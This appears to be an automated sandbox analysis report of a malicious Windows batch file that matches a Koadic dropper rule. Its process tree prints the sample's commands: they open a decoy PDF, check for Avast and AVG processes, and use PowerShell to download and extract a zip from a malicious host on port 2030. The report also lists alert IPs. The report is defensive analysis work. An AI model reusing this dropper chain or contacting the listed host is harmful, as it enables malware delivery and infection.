Edit tour
Windows
Analysis Report
new.bat
Overview
General Information
Detection
Score: | 76 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
AI detected suspicious sample
Loading BitLocker PowerShell Module
Powershell drops PE file
Suspicious powershell command line found
Uses known network protocols on non-standard ports
AV process strings found (often used to terminate AV products)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Yara signature match
Classification
- System is w10x64
- cmd.exe (PID: 4460 cmdline:
C:\Windows \system32\ cmd.exe /c ""C:\User s\user\Des ktop\new.b at" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 1512 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - Acrobat.exe (PID: 5116 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\Acrobat .exe" "C:\ Users\user \Downloads \AQRFEVRTG L.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C) - AcroCEF.exe (PID: 7508 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ba ckgroundco lor=167772 15 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE) - AcroCEF.exe (PID: 7792 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --log-seve rity=disab le --user- agent-prod uct="Reade rServices/ 23.6.20320 Chrome/10 5.0.0.0" - -lang=en-U S --log-fi le="C:\Pro gram Files \Adobe\Acr obat DC\Ac robat\acro cef_1\debu g.log" --m ojo-platfo rm-channel -handle=20 72 --field -trial-han dle=1728,i ,170427757 6442734712 1,15159452 3193797359 21,131072 --disable- features=B ackForward Cache,Calc ulateNativ eWinOcclus ion,WinUse BrowserSpe llChecker /prefetch: 8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE) - timeout.exe (PID: 7144 cmdline:
timeout /t 5 REM Wa it for PDF to open ( adjust tim eout as ne eded) MD5: 100065E21CFBBDE57CBA2838921F84D6) - tasklist.exe (PID: 7180 cmdline:
tasklist / FI "IMAGEN AME eq Ava stUI.exe" MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA) - find.exe (PID: 7192 cmdline:
find /i "A vastUI.exe " MD5: 4BF76A28D31FC73AA9FC970B22D056AF) - tasklist.exe (PID: 7276 cmdline:
tasklist / FI "IMAGEN AME eq avg ui.exe" MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA) - find.exe (PID: 7284 cmdline:
find /i "a vgui.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF) - powershell.exe (PID: 7356 cmdline:
powershell -Command "try { [Ne t.ServiceP ointManage r]::Securi tyProtocol = [Net.Se curityProt ocolType]: :Tls12; In voke-WebRe quest -Uri 'http://j snybsafva. info:2030/ bab.zip' - OutFile 'C :\Users\us er\Downloa ds\downloa ded.zip' } catch { e xit 1 }" MD5: 04029E121A0CFA5991749937DD22A1D9) - powershell.exe (PID: 3804 cmdline:
powershell -Command "try { Exp and-Archiv e -Path 'C :\Users\us er\Downloa ds\downloa ded.zip' - Destinatio nPath 'C:\ Users\user \Downloads \Extracted ' -Force } catch { e xit 1 }" MD5: 04029E121A0CFA5991749937DD22A1D9)
- svchost.exe (PID: 7660 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- cleanup
⊘No configs have been found
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
MALWARE_BAT_KoadicBAT | Koadic post-exploitation framework BAT payload | ditekSHen |
|
System Summary |
---|
Source: | Author: frack113, Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Source: | Author: vburov: |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-01-15T08:56:49.702321+0100 | 2036752 | 1 | A Network Trojan was detected | 154.216.17.175 | 2030 | 192.168.2.7 | 49713 | TCP |
2025-01-15T08:58:49.061894+0100 | 2036752 | 1 | A Network Trojan was detected | 154.216.17.175 | 2030 | 192.168.2.7 | 49713 | TCP |
2025-01-15T08:58:52.754674+0100 | 2036752 | 1 | A Network Trojan was detected | 154.216.17.175 | 2030 | 192.168.2.7 | 49713 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-01-15T08:55:20.994831+0100 | 1810000 | 2 | Potentially Bad Traffic | 192.168.2.7 | 49713 | 154.216.17.175 | 2030 | TCP |
Click to jump to signature section
Show All Signature Results
AV Detection |
---|
Source: | Integrated Neural Analysis Model: |
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: |
Networking |
---|
Source: | Suricata IDS: |
Source: | Network traffic detected: | ||
Source: | Network traffic detected: |
Source: | TCP traffic: |
Source: | IP Address: | ||
Source: | IP Address: |
Source: | ASN Name: |
Source: | Suricata IDS: |
Source: | HTTP traffic detected: |
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: |
Source: | HTTP traffic detected: |